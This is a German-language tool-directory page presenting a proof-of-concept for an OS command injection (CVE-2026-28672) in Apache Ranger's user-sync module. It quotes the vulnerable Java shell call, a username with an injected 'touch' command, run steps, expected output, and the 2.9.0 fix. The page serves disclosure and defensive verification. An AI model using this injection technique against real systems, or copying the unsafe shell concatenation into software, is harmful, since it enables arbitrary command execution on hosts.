Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-28672 — Proof-of-concept-Reproduzierer für die OS-Befehlsinjektion bei Apache Ranger UnixUserGroupBuilder (CVE-2026-28672), der die Schwachstelle demonstriert und die Behebung verifiziert. | Kitploit
Tools/GitHubGitHub/oscerd/cve-2026-28672
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPapers & ForschungLernen & Bildung
GitHuboscerd/cve-2026-28672

CVE-2026-28672

Proof-of-concept-Reproduzierer für die OS-Befehlsinjektion bei Apache Ranger UnixUserGroupBuilder (CVE-2026-28672), der die Schwachstelle demonstriert und die Behebung verifiziert.

Repository anzeigen
vor 8h 36mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-28672 — Apache Ranger UnixUserGroupBuilder OS-Befehlseinschleusung

Ausführbarer Proof-of-Concept zur Reproduktion der OS-Befehlseinschleusung im User-Sync-Modul (unixusersync) von Apache Ranger.

Beim Auflisten der Gruppen jedes synchronisierten Benutzers führt UnixUserGroupBuilder den Befehl id über eine Shell aus und verkettet den Benutzernamen mit der Befehlszeile:

root@kitploit:~
// ugsync/src/main/java/org/apache/ranger/unixusersync/process/UnixUserGroupBuilder.java  (Ranger <= 2.8.0)
Process process = Runtime.getRuntime().exec(new String[]{"bash", "-c", "id -G " + userName});

Der Benutzername stammt aus der konfigurierten User-Sync-Quelle (LDAP/AD oder einer Datei) und ist daher vom Angreifer beeinflussbar. Ein Benutzername, der Shell-Metazeichen enthält — z. B. alice; touch /tmp/pwned — wird als OS-Befehl ausgeführt (CWE-77, Unzureichende Neutralisierung spezieller Elemente, die in einem Befehl verwendet werden).

Ausführen

root@kitploit:~
mvn -q -DskipTests package
docker compose up --build
# or, without Docker (needs bash/id/touch on PATH):
java -jar target/cve-2026-28672.jar
Tool herunterladen

Erwartete Ausgabe auf dem verwundbaren Codepfad:

root@kitploit:~
[1] Benign username 'nobody':
      id -G nobody -> 65534
[2] Malicious username 'nobody; touch /tmp/pwned-28672' (vulnerable <= 2.8.0):
      injected command executed? marker /tmp/pwned-28672 exists = true
[3] Same malicious username through the 2.9.0 FIX (id run directly, no shell):
      id -G 'nobody; touch /tmp/pwned-28672' -> null
      injected command executed? marker exists = false
>>> PROVEN: ... OS command injection (CWE-77): true

Zusammenfassung der Schwachstelle

EigenschaftWert
ProjektApache Ranger — org.apache.ranger.unixusersync (user-sync)
KlasseCWE-77 Unzureichende Neutralisierung spezieller Elemente, die in einem Befehl verwendet werden ('Command Injection')
AngriffsvektorEin Benutzername mit Shell-Metazeichen, der von der User-Sync-Quelle geliefert wird
AuswirkungBeliebige OS-Befehlsausführung auf dem Ranger-User-Sync-Host
Betroffene Versionenvon 0.6 bis einschließlich 2.8
Behobene Version2.9.0
Sicherheitshinweislists.apache.org-Thread · CVE-2026-28672
EntdeckerAndrea Cosentino

Die Behebung

Apache Ranger 2.9.0 führt id direkt als Argumentvektor aus, sodass der Benutzername ein einzelnes literales Argument ist und niemals von einer Shell interpretiert wird:

root@kitploit:~
// Ranger 2.9.0
Process process = Runtime.getRuntime().exec(new String[] {"id", "-G", userName});

UnixUserGroupBuilderVuln.java in diesem Repository enthält beide Varianten wörtlich, mit Verweis auf die Upstream-Quelle.

Haftungsausschluss

Dieses Repository wird zu Bildungs- und Verteidigungszwecken veröffentlicht: um Apache-Ranger-Nutzern zu helfen, die Schwachstelle zu verstehen, zu überprüfen, ob sie betroffen sind, und zu bestätigen, dass ein Upgrade das Problem behebt. Der Payload ist harmlos (er erstellt eine Markierungsdatei unter /tmp). Verwenden Sie dieses Material nicht gegen Systeme, die Ihnen nicht gehören oder die Sie nicht betreiben.